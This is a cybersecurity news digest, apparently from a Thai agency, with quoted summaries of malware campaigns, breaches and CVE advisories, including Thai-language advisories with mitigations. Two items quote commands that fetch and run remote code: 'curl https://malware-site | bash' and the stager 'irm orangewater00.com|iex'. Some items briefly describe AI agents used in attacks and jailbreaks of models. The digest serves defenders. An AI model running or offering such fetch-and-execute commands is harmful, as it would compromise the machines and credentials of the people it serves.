  "Pillar Security researchers analyzed the hackerbot-claw campaign, we named “Chaos Agent” - the first publicly documented campaign where an AI agent, operating on natural-language instructions, conducted an end-to-end attack against production open-source infrastructure. Within 37 hours, hackerbot-claw identified vulnerable open-source projects, crafted targeted exploits, compromised CI/CD pipelines, and published a malicious extension that turned developers' own AI coding tools into credential-stealing accomplices."
  https://www.pillar.security/blog/hackerbot-claw-adversarial-agent-targets-top-github-repos
  https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/
• Someone Else’s SIEM: A Threat Actor Abuses Another Free Trial
  "Huntress discovered a threat actor was exploiting vulnerabilities (like SolarWinds Web Help Desk) and exfiltrating victim data to a free trial instance of Elastic Cloud SIEM. The actor used the SIEM for victim triage, and the infrastructure revealed details about their campaign, including disposable email services (quieresmail.com), connections to a Russian-registered temporary email network (firstmail.ltd), use of a SAFING_VPN tunnel, and a possible connection to other opportunistic attacks against Microsoft SharePoint and other software. The instance has since been taken down."
  https://www.huntress.com/blog/threat-actor-abuses-elastic-cloud-siem
  https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
• Fake Claude Code Install Pages Hit Windows And Mac Users With Infostealers
  "Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator."
  https://www.malwarebytes.com/blog/news/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers
• Quiz Sites Trick Users Into Enabling Unwanted Browser Notifications
  "Our support team flagged a number of customers who suspected their device might be infected with malware, but Malwarebytes scans came up empty. When the customers provided screenshots, our Malware Removal Support team quickly recognized the format as web push notifications. The reason the scans came up clean is that these notifications aren’t malware on the device. They’re browser notifications from websites that trick users into clicking “Allow.”"
  https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications
• GhostClaw Unmasked: A Malicious Npm Package Impersonating OpenClaw To Steal Everything
  "The JFrog Security research team has identified a live malicious npm package named @openclaw-ai/openclawai. This package masquerades as a legitimate CLI tool called "OpenClaw Installer" while deploying a multi-stage infection chain that steals system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, iMessage history, and more - then installs a persistent RAT with full remote access capabilities including a SOCKS5 proxy and live browser session cloning. The attack is notable for its broad data collection, its use of social engineering to harvest the victim's system password, and the sophistication of its persistence and C2 infrastructure. Internally, the malware identifies itself as GhostLoader."
  https://research.jfrog.com/post/ghostclaw-unmasked/
  https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html
• From a Sophisticated Browser-Extension Supply-Chain Compromise To a VibeCoded Twist: A Chrome Extension As The Initial Access Vector For a Broader Malware Chain
  "A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data. In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe, a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell 4104 logs later confirmed execution of the decoded stager irm orangewater00.com|iex and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic. In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability."
  https://monxresearch-sec.github.io/shotbird-extension-malware-report/
  https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html

Breaches/Hacks/Leaks

• Ericsson US Discloses Data Breach After Service Provider Hack
  "Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers. Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide. In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025."
  https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
• EV Charger Biz ELECQ Zapped By Ransomware Crooks, Customer Contact Data Stolen
  "ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems. In a notice sent to customers on Monday and seen by The Register, the EV charging outfit said that it detected "unusual activity" on its AWS cloud platform on March 7 and quickly discovered that attackers had launched a ransomware attack against parts of its infrastructure."
  https://www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/

General News

• Google: Cloud Attacks Exploit Flaws More Than Weak Credentials
  "Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days. At the same time, the use of weak credentials or misconfigurations has dropped significantly in the second half of 2025, Google notes in a report highlighting the trends on threats to cloud users. According to the report, incident responders determined that bug exploits were the primary access vector in 44.5% of the investigated intrusions, while credentials were responsible for 27% of the breaches."
  https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/
  https://services.google.com/fh/files/misc/cloud_threat_horizons_report_h12026.pdf
• Dutch Govt Warns Of Signal, WhatsApp Account Hijacking Attacks
  "Russian state-sponsored hackers have been linked to an ongoing Signal and WhatsApp phishing campaign targeting government officials, military personnel, and journalists to gain access to sensitive messages. This report comes from the Netherlands Defence Intelligence and Security Service (MIVD) and the Netherlands General Intelligence and Security Service (AIVD), who confirmed that Dutch government employees have been targeted in the attacks. The Dutch intelligence agencies say the operation relies on phishing and social-engineering techniques that abuse legitimate authentication features to take over accounts and covertly monitor new messages."
  <1https://www.bleepingcomputer.com/news/security/dutch-govt-warns-of-signal-whatsapp-account-hijacking-attacks/>
  https://therecord.media/russian-hackers-target-signal-whatsapp-warn-dutch-intelligence-agencies
  https://hackread.com/dutch-intel-russia-hackers-hijack-signal-whatsapp-attacks/
  https://securityaffairs.com/189156/intelligence/russia-linked-hackers-target-signal-whatsapp-of-officials-globally.html
  https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/
  https://www.helpnetsecurity.com/2026/03/09/signal-whatsapp-accounts-russian-hackers/
• Are We Ready For Auto Remediation With Agentic AI?
  "The key to security program effectiveness is optimizing remediation. This has become increasingly difficult as organizations strive to modernize their processes with innovative technologies, including artificial intelligence (AI). As employees gain capabilities to collaborate and work faster, cyber assets and attack surfaces proliferate, making it difficult for security teams to take the needed actions to mitigate risk. Now, as organizations look to leverage agentic AI in areas such as software development, instead of incrementally increasing productivity, we are expecting exponential gains in productivity, further proliferating attack surfaces. At the same time, the threat landscape will also evolve rapidly, with attackers taking advantage of AI to scale their attacks."
  https://www.darkreading.com/application-security/auto-remediation-agentic-ai
• More AI Tools, More Burnout! New Research Explains Why
  "Workflows built around multiple AI agents and constant tool switching are adding cognitive strain across large enterprises. A recent Harvard Business Review analysis describes this pattern as “AI brain fry,” a form of mental fatigue tied to intensive use and oversight of AI systems. Employees increasingly manage clusters of agents that generate code, synthesize information, and produce drafts at high speed. Performance systems in some organizations reward activity metrics such as token consumption and AI output volume. This structure pushes workers to monitor more systems and outcomes within the same workday."
  https://www.helpnetsecurity.com/2026/03/09/harvard-business-review-ai-workplace-fatigue-report/
• Ghanaian Pleads Guilty To Role In $100m Romance Scam
  "A Ghanaian national had pleaded guilty to scamming countless victims as part of a global fraud ring that engaged in romance fraud and business email compromise (BEC). The Justice Department announced the guilty plea for Derrick Van Yeboah, 40, late last week. The fraud operation, which was primarily based in Ghana, is said to have caused over $100m in losses, 10% of which were pinned on Van Yeboah. As per typical scams of this kind, he impersonated romantic partners in online communications with vulnerable victims."
  https://www.infosecurity-magazine.com/news/ghanaian-pleads-guilty-100m/
• Cloud Threat Horizons Report H1 2026
  "The Google Cloud Threat Horizons Report provides decision-makers with strategic intelligence on threats to not just Google Cloud, but all cloud service providers. The report focuses on recommendations for mitigating risks and improving cloud security for leaders and practitioners. The report is informed by Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and various Google Cloud intelligence, security, and product teams."
  https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026
  https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html
• White House Cyber Strategy Prioritizes Offense
  "The Trump administration released a notably hawkish vision of American cyber power that blends deregulation at home with deterrence and offense against adversaries abroad. In a relatively brief seven-page document published on Friday, President Trump's Cyber Strategy for America framed cybersecurity both as a defensive IT challenge and as a strategic domain where the US must assert dominance amid intensifying geopolitical rivalries. American response to cyber threats will not be confined to the cyber realm, the document warned."
  https://www.darkreading.com/cybersecurity-operations/white-house-cyber-strategy-prioritizes-offense
  https://www.whitehouse.gov/wp-content/uploads/2026/03/President-Trumps-Cyber-Strategy-for-America.pdf
  https://therecord.media/trump-cyber-strategy-released-regulations
  https://www.bankinfosecurity.com/trump-pledges-action-on-cybercrime-cyberspace-threats-a-30942
  https://www.infosecurity-magazine.com/news/usa-unveils-new-cyber-strategy/
  https://www.securityweek.com/us-cyber-strategy-targets-adversaries-critical-infrastructure-and-emerging-technologies/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

1. รายละเอียดเหตุการณ์
   • ผู้โจมตีจะส่งอีเมลสแปมจำนวนมากไปยังเหยื่อ เพื่อสร้างสถานการณ์ว่าระบบอีเมลของเหยื่อมีปัญหา และจะติดต่อผ่าน Microsoft Teams โดยแอบอ้างเป็นเจ้าหน้าที่ฝ่าย IT เพื่อเปิดช่องทางการเข้าถึงเครื่องคอมพิวเตอร์

2. พฤติกรรมการโจมตี
   • ผู้โจมตีจะส่งอีเมลสแปมจำนวนมากไปยังเหยื่อ เพื่อสร้างสถานการณ์ว่าระบบอีเมลของเหยื่อมีปัญหา และจะติดต่อผ่าน Microsoft Teams โดยแอบอ้างเป็นเจ้าหน้าที่ฝ่าย IT
   • หลอกให้เหยื่อเปิดใช้งาน Quick Assist เพื่อให้ผู้โจมตีเข้าควบคุมเครื่อง
   • หลังจากเข้าควบคุมครื่องได้แล้ว ผู้โจมตีจะติดตั้งไฟล์ (MSI) ที่เป็นอันตราย โดยไฟล์ดังกล่าวถูกโฮสต์ไว้บนคลาวด์ของ Microsoft ที่เป็นบัญชีส่วนบุคคลของผู้โจมตี
   • ไฟล์ดังกล่าวจะปลอมแปลงเป็นส่วนประกอบของ Microsoft Teams และ CrossDeviceService ซึ่งเป็นเครื่องมือของ Windows
   • เมื่อทำการติดตั้งแล้ว มัลแวร์ A0Backdoor จะเปิดช่องทางให้ผู้โจมตีเข้าควบคุมระบบ

3. แนวทางป้องกันและลดความเสี่ยง
   • กำหนดนโยบายจำกัดการติดต่อจาก บัญชี Microsoft Teams ภายนอกองค์กร
   • หลีกเลี่ยงการเปิดใช้งาน Quick Assist หรือ Remote Access
   • ตรวจสอบและติดตามการติดตั้งไฟล์ MSI หรือโปรแกรมที่ไม่ได้รับอนุญาต
   • จำกัดสิทธิ์การติดตั้งซอฟต์แวร์ของผู้ใช้งานทั่วไป
   • ใช้งานระบบ Endpoint Detection and Response (EDR) หรือระบบตรวจจับภัยคุกคามเพื่อเฝ้าระวังพฤติกรรมผิดปกติ

4. แหล่งอ้างอิง (References)
   • https://dg.th/ty86mhid20

หากมีบุคคลจะติดต่อผ่าน Microsoft Teams และอ้างว่าเป็นเจ้าหน้าที่ฝ่าย IT ควรตรวจสอบตัวตนผ่านช่องทางภายในองค์กรก่อนทุกครั้ง

1. รายละเอียดช่องโหว่
   CVE-2026-3342 - Out-of-bounds Write in WatchGuard Fireware OS (CVSS v3.1: 7.2)
   ช่องโหว่นี้เกิดจากการเขียนข้อมูลเกินขอบเขตหน่วยความจำและอาจทำให้ผู้ดูแลระบบที่ผ่านการยืนยันตัวตนแล้ว สามารถ execute arbitrary code with root permissions ผ่าน exposed management interface ได้

2. ผลิตภัณฑ์ที่ได้รับผลกระทบ

• Fireware OS 11.9 ถึง 11.12.4_Update1
• Fireware OS 12.0 ถึง 12.11.7
• Fireware OS 2025.1 ถึง 2026.1.1

3. แนวทางการแก้ไข

• อัพเดท Fireware OS 2026.1.2
• อัพเดท Fireware OS 12.11.8
• สำหรับ Fireware OS 12.5.x (T15 & T35 models) ให้อัปเดตเป็น 12.5.17
• สำหรับ Fireware OS 11.x ผู้ผลิตระบุว่าเป็น End of Life แล้ว จึงควรวางแผนอัปเกรดหรือเปลี่ยนทดแทนโดยเร็ว.

4. หากยังไม่สามารถอัปเดตได้ ควรดำเนินการดังนี้
   ไม่มี workaround สำหรับช่องโหว่นี้ควรรีบดำเนินการอัพเดทโดยด่วน

5. แหล่งอ้างอิง

• https://dg.th/m3bh0e9pfd
• https://dg.th/ehtnqcjbpk

1. รายละเอียดช่องโหว่
   CVE-2026-22886 - Use of Default Credentials / Default Password (CVSS v3.1: 9.8)
   ช่องโหว่นี้เกิดจากระบบมีบัญชีผู้ดูแลค่าเริ่มต้นและไม่บังคับเปลี่ยนรหัสผ่านเมื่อใช้งานครั้งแรกส่งผลให้รหัสผ่านเริ่มต้นยังคงใช้ได้อย่างต่อเนื่อง หากผู้โจมตีเข้าถึงพอร์ตของบริการ imqbrokerd ได้ ก็สามารถยืนยันตัวตนเป็นผู้ดูแลและเข้าควบคุมฟังก์ชันการบริหารจัดการของ broker ได้

2. ผลิตภัณฑ์ที่ได้รับผลกระทบ
   Eclipse OpenMQ ทุกเวอร์ชัน

3. แนวทางการแก้ไข

• เปลี่ยนรหัสผ่านเริ่มต้นของ Eclipse OpenMQ

4. แนวทางลดความเสี่ยง

• ตรวจสอบทันทีว่ามีการเปิดใช้บริการ imqbrokerd หรือไม่
• ปิด service ดังกล่าวหากไม่จำเป็น
• หากจำเป็นต้องใช้งานให้เปลี่ยนรหัสผ่านเริ่มต้นของบัญชีผู้ดูแลทันทีเป็นรหัสผ่านที่รัดกุมและไม่ซ้ำ
• จำกัดการเข้าถึงพอร์ตให้เฉพาะผู้ดูแลที่ได้รับอนุญาต

5.แหล่งอ้างอิง

• https://dg.th/1vxqlprwea
• https://dg.th/fsydbjm0rh

• APT And Financial Attacks On Industrial Organizations In Q4 2025
  "In the last quarter of 2025, information security researchers published numerous interesting reports on attacks against industrial organizations. Most of them highlight the persistence of long-standing problems: untimely installation of security updates, including on internet-accessible systems; insecure provision of remote access to internal systems; the difficulty of monitoring the security of trusted partners and suppliers; the inability to guarantee 100% protection for traditional operating systems with their inherent information security issues (DLL hijacking, BYOVD, and malware); and the lack of staff preparedness to resist basic social engineering techniques."
  https://ics-cert.kaspersky.com/publications/reports/2026/03/06/apt-and-financial-attacks-on-industrial-organizations-in-q4-2025/

New Tooling

• Codex Security: Now In Research Preview
  "Today we’re introducing Codex Security, our application security agent. It builds deep context about your project to identify complex vulnerabilities that other agentic tools miss, surfacing higher-confidence findings with fixes that meaningfully improve the security of your system while sparing you from the noise of insignificant bugs."
  https://openai.com/index/codex-security-now-in-research-preview/
  https://thehackernews.com/2026/03/openai-codex-security-scanned-12.html

Vulnerabilities

• Critical Nginx UI Flaw CVE-2026-27944 Exposes Server Backups
  "A critical vulnerability in Nginx UI, tracked as CVE-2026-27944 (CVSS score of 9.8), allows attackers to download and decrypt full server backups without authentication. The flaw poses a serious risk to organizations exposing the management interface, potentially revealing sensitive configuration data, credentials, and encryption keys. “The /api/backup endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the X-Backup-Security response header.” reads the advisory. “This allows an unauthenticated attacker to download a full system backup containing sensitive data (user credentials, session tokens, SSL private keys, Nginx configurations) and decrypt it immediately.”"
  https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html
  https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762
• Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited
  "Exposure management company WatchTowr reports that a recent Cisco Catalyst SD-WAN vulnerability, initially exploited as a zero-day, is now being used more frequently by threat actors. The in-the-wild exploitation of four Cisco Catalyst SD-WAN vulnerabilities came to light in recent weeks. One of them is CVE-2026-20127, which had been exploited as a zero-day in combination with an older vulnerability, CVE-2022-20775, to bypass authentication, escalate privileges, and establish persistence on systems."
  https://www.securityweek.com/recent-cisco-catalyst-sd-wan-vulnerability-now-widely-exploited/

Malware

• InstallFix: How Attackers Are Weaponizing Malvertized Install Guides
  "There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system. But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions."
  https://pushsecurity.com/blog/installfix/
  https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/
• Cyberattacks And Unpredictable Targeting Remain An Iran Risk
  "Cyberattacks launched by Iranian nation-state hackers in reprisal for what the United States has codenamed Operation Epic Fury so far have been evident mainly in their absence. Whether the regime's military or intelligence forces have the inclination or ability to launch such attacks isn't clear. The country continues to operate in a near-total internet blackout initiated for reasons unknown at the start of hostilities by the United States and Israel on Feb. 28, monitoring firm Netblocks reported early Friday."
  https://www.bankinfosecurity.com/cyberattacks-unpredictable-targeting-remain-iran-risk-a-30930
• AI As Tradecraft: How Threat Actors Operationalize AI
  "Threat actors are operationalizing AI along the cyberattack lifecycle to accelerate tradecraft, abusing both intended model capabilities and jailbreaking techniques to bypass safeguards and perform malicious activity. As enterprises integrate AI to improve efficiency and productivity, threat actors are adopting the same technologies as operational enablers, embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations."
  https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/
  https://www.darkreading.com/threat-intelligence/north-korean-apts-ai-it-worker-scams
  https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/
  https://cyberscoop.com/microsoft-north-korea-ai-operations/
• Fake CleanMyMac Site Installs SHub Stealer And Backdoors Crypto Wallets
  "A convincing fake version of the popular Mac utility CleanMyMac is tricking users into installing malware. The site instructs visitors to paste a command into Terminal. If they do, it installs SHub Stealer, macOS malware designed to steal sensitive data including saved passwords, browser data, Apple Keychain contents, cryptocurrency wallets, and Telegram sessions. It can even modify wallet apps such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live so attackers can later steal the wallet’s recovery phrase."
  https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets
• Middle East Conflict Fuels Opportunistic Cyber Attacks
  "Threat actors often take advantage of major global events to fuel interest in their malicious activities. Zscaler ThreatLabz is diligently tracking a surge in cybercriminal activity that capitalizes on the elevated political climate in the Middle East. This increased malicious activity includes discoveries that are directly tied to the ongoing conflict, alongside other related findings."
  https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks
• Malware Brief: When The Supply Chain Becomes The Attack Surface
  "For a long time, defenders focused on hardening the perimeter: patch your systems, train your users, lock down your endpoints. But as supply-chain threats multiply, attackers are increasingly bypassing perimeter defenses and walking straight in through trusted software, services and dependencies. That’s what makes software supply‑chain attacks so effective. Instead of compromising one company at a time, threat actors target a single vendor, developer account or build system and let trust do the rest of the work for them."
  https://blog.barracuda.com/2026/03/05/malware-brief-supply-chain-attack-surface
  VOID#GEIST: Stealthy Multi-Stage Python Loader With Embedded Runtime Deployment, Startup * Persistence, And Fileless Early Bird APC Injection Into Explorer.exe
  "Securonix Threat Research analyzed a stealthy, multi-stage malware intrusion chain utilizing an obfuscated batch script (non.bat) to deliver multiple encrypted RAT shellcode payloads corresponding to XWorm, XenoRAT, and AsyncRAT. The script establishes persistence by deploying a secondary batch script (spol.bat) into the Windows Startup folder, stages a legitimate embedded Python runtime from python.org, and decrypts encrypted shellcode blobs (new.bin, pul.bin, xn.bin) at runtime using external XOR key material (a.json, p.json, n.json)."
  https://www.securonix.com/blog/voidgeist-stealthy-multi-stage-python-loader/
  https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html
• Microsoft Reveals ClickFix Campaign Using Windows Terminal To Deploy Lumma Stealer
  "Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command into it."
  https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
  https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html
  https://www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/
• Mobile Spyware Campaign Impersonates Israel's Red Alert Rocket Warning System
  "Acronis Threat Research Unit (TRU) has been actively monitoring malware campaigns and threat activity leveraging recent geopolitical developments across the Middle East and abusing these events to deliver malware to individuals. During our investigation, TRU identified a targeted campaign distributing a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications, aimed at Israeli individuals."
  https://www.acronis.com/en/tru/posts/mobile-spyware-campaign-impersonates-israels-red-alert-rocket-warning-system/
  https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/
  https://hackread.com/hackers-fake-red-alert-rocket-alert-app-spy-israel-users/
• An Investigation Into Years Of Undetected Operations Targeting High-Value Sectors
  "Since at least 2020, we have observed a cluster of activity targeting high-value organizations across South, Southeast and East Asia. The attacks focus on critical sectors such as aviation, energy, government, law enforcement, pharmaceutical, technology and telecommunications. Unit 42 is tracking this ongoing, previously undocumented activity as CL-UNK-1068. We designate the term UNK to clusters of activity whose affiliation with either nation-state or cybercrime activity we have not yet determined."
  https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/
• Dark Web Profile: APT41
  "APT41 stands out in the threat landscape because it doesn’t stick to a single playbook. It has been repeatedly linked to both cyber espionage and financially motivated cybercrime, sometimes running those missions side by side. That dual-track model, paired with exploit-driven access and long-dwell intrusions, makes APT41 a high-signal profile for defenders looking to understand how modern operations blend strategy, stealth, and scale."
  https://socradar.io/blog/dark-web-profile-apt41/
• Iranian APT Infrastructure In Focus: Mapping State-Aligned Clusters During Geopolitical Escalation
  "Tensions between the United States, Israel, and Iran have reached a critical point following a series of diplomatic breakdowns, which led to escalating military exchanges and proxy engagements across the Middle East. History has shown that when hostilities rise to this degree, cyber operations do not lag far behind kinetic activity. They precede it. These operations, whether infrastructure reconnaissance, pre-positioning, or network intrusion, are part of the operational groundwork of modern conflict. Disrupting communications and compromising critical systems can weaken response capabilities long before physical engagement begins. Iranian state-aligned actors have historically targeted energy, financial services, government networks, and defense-related organizations across the U.S., Israel, and allied regions."
  https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters
• OCRFix Botnet Hides C2 In BNB Smart Chain Contracts
  "OCRFix is a three-stage botnet that stores its C2 URLs inside BNB Smart Chain testnet smart contracts. Each stage queries a contract via JSON-RPC at runtime to get the current C2 domain. To rotate infrastructure, the author updates the contract storage with a single blockchain transaction. Every infected machine follows on next check-in. No binary update required. Initial access is ClickFix -- a fake CAPTCHA that walks the victim through opening Windows Run and pasting a PowerShell command the page has placed in their clipboard."
  https://www.derp.ca/research/ocrfix-etherhiding-botnet/
• Termite Ransomware Breaches Linked To ClickFix CastleRAT Attacks
  "Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor. Researchers at cyber-deception threat intelligence firm MalBeacon observed the hackers' actions in an emulated organization environment over a period of 12 days. Velvet Tempest, also tracked as DEV-0504, is a threat group that has been involved in ransomware attacks as an affiliate for at least five years."
  https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/

Breaches/Hacks/Leaks

• Cognizant TriZetto Breach Exposes Health Data Of 3.4 Million Patients
  "TriZetto Provider Solutions, a healthcare IT company that develops software and services used by health insurers and healthcare providers, has suffered a data breach that exposed the sensitive information of over 3.4 million people. The firm, which has been operating under the Cognizant umbrella since 2014, disclosed that it detected suspicious activity on a web portal on October 2, 2025, and launched an investigation with the help of external cybersecurity experts."
  https://www.bleepingcomputer.com/news/security/cognizant-trizetto-breach-exposes-health-data-of-34-million-patients/
• 2,622 Valid Certificates Exposed: A Google-GitGuardian Study Maps Private Key Leaks To Real-World Risk
  "When a private key leaks on GitHub or DockerHub, detecting it is easy. What's harder, sometimes impossible, is understanding its real-world impact. Unlike AWS keys or OpenAI tokens, which are tied to their respective service, a leaked private key is just a mathematical object without an obvious owner. Private keys are challenging to attribute at scale: they are used in many different contexts, ranging from SSH authentication to JWT signatures. When one leaks, where do you start assessing the impact? Among leaked private keys, those used in X.509 infrastructure are most critical. They authenticate web servers in HTTPS: a compromised key enables attackers to impersonate websites or intercept data. That's why GitGuardian partnered with Google's researchers to answer a deceptively simple question: what happens when private keys leak?"
  https://blog.gitguardian.com/certificates-exposed-a-google-gitguardian-study/
  https://hackread.com/certificates-fortune-500-gov-exposed-key-leaks/
• Transport For London Says 2024 Breach Affected 7M Customers, Not 5,000
  "Transport for London has confirmed that a 2024 breach exposed the data of more than 7 million people – a far larger crowd than the few thousand customers originally warned that their details might be at risk. The BBC reported on Friday that the 2024 intrusion into TfL's systems potentially gave attackers access to a database covering as many as 10 million customers who had interacted with the capital's transport network."
  https://www.theregister.com/2026/03/06/tfl_2024_breach_numbers/

General News

• Cyberattack On Mexico's Gov't Agencies Highlight AI Threat
  "For any cyber-defender continuing to deny the impact of AI on attacker efficiency, welcome to Exhibit A. Over the past few months, a small group of hacktivists compromised the computers and networks of at least nine Mexican government agencies, stealing more than 195 million identities and tax records, along with vehicle registrations and more than 2.2 million property records, startup Gambit Security stated in a blog post this week that detailed the attack."
  https://www.darkreading.com/application-security/cyberattack-mexico-government-ai-threat
• Backup Strategies Are Working, And Ransomware Gangs Are Responding With Data Theft
  "Business email compromise (BEC) and funds transfer fraud combined for 58% of all cyber insurance claims filed in 2025, according to data from Coalition covering more than 100,000 policyholders across the United States, Canada, the United Kingdom, Australia, and Germany. BEC was the single most common claim type at 31%, with frequency rising 15% year over year to 0.47%. Average losses per BEC incident dropped 28% to $27,000, a decline attributed to faster detection and response by affected organizations."
  https://www.helpnetsecurity.com/2026/03/06/cyber-claims-report-ransomware-gangs-data-theft/
• What Happens When AI Teams Compete Against Human Hackers
  "A cybersecurity competition produced what may be the largest controlled dataset comparing AI-augmented teams to human-only teams on professional-grade offensive security tasks. The event, called NeuroGrid, ran for 72 hours on the Hack The Box platform and drew 1,337 registered human-only teams and 156 registered AI-agent teams competing across 36 challenges in nine security domains at four difficulty levels. AI teams operated through Model Context Protocol with human oversight in the loop. The analysis covers 958 human teams and 120 AI-agent teams that each attempted at least one challenge."
  https://www.helpnetsecurity.com/2026/03/06/cybersecurity-competition-ai-vs-human-hackers/
• Exploits And Vulnerabilities In Q4 2025
  "The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately. In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025."
  https://securelist.com/vulnerabilities-and-exploits-in-q4-2025/119105/
• Viral AI, Invisible Risks: What OpenClaw Reveals About Agentic Assistants
  "The name OpenClaw might not immediately be recognizable, partly because it has undergone several name changes, from Clawdbot to Moltbot, then finally to OpenClaw. Yet one thing is certain: This new digital assistant feels genuinely groundbreaking. It remembers past interactions, keeps data on the user’s device, and adapts to individual preferences, making it feel like a leap in capabilities reminiscent of the first ChatGPT release. At the same time, its development is not without caveats, as there have been media headlines that warn of its potential as a security nightmare."
  https://www.trendmicro.com/en_us/research/26/b/what-openclaw-reveals-about-agentic-assistants.html
• AI Agents Now Help Attackers, Including North Korea, Manage Their Drudge Work
  "AI agents allow cybercriminals and nation-state hackers to outsource the "janitorial-type work" needed to plan and carry out cyberattacks, according to Sherrod DeGrippo, Microsoft's GM of global threat intelligence. North Korea is taking advantage. This includes tasks such as performing reconnaissance on compromised computers, and standing up and managing attack infrastructure - which may not sound as thrilling as plotting and carrying out digital intrusions, but are real-world criminal use cases for agentic AI that should make threat hunters sit up and take notice."
  https://www.theregister.com/2026/03/08/deploy_and_manage_attack_infrastructure/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

• Cisco Flags More SD-WAN Flaws As Actively Exploited In Attacks
  "Cisco has flagged two Catalyst SD-WAN Manager security flaws as actively exploited in the wild, urging administrators to upgrade vulnerable devices. Catalyst SD-WAN Manager (formerly vManage) is network management software that enables admins to monitor and manage up to 6,000 Catalyst SD-WAN devices from a single centralized dashboard. "In March 2026, the Cisco PSIRT became aware of active exploitation of the vulnerabilities that are described in CVE-2026-20128 and CVE-2026-20122 only," the company warned in an update to a February 25 advisory."
  https://www.bleepingcomputer.com/news/security/cisco-flags-more-sd-wan-flaws-as-actively-exploited-in-attacks/
  https://www.securityweek.com/cisco-warns-of-more-catalyst-sd-wan-flaws-exploited-in-the-wild/
  https://www.helpnetsecurity.com/2026/03/05/cisco-cve-2026-20128-cve-2026-20122-exploited/
• User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation Via Membership Registration
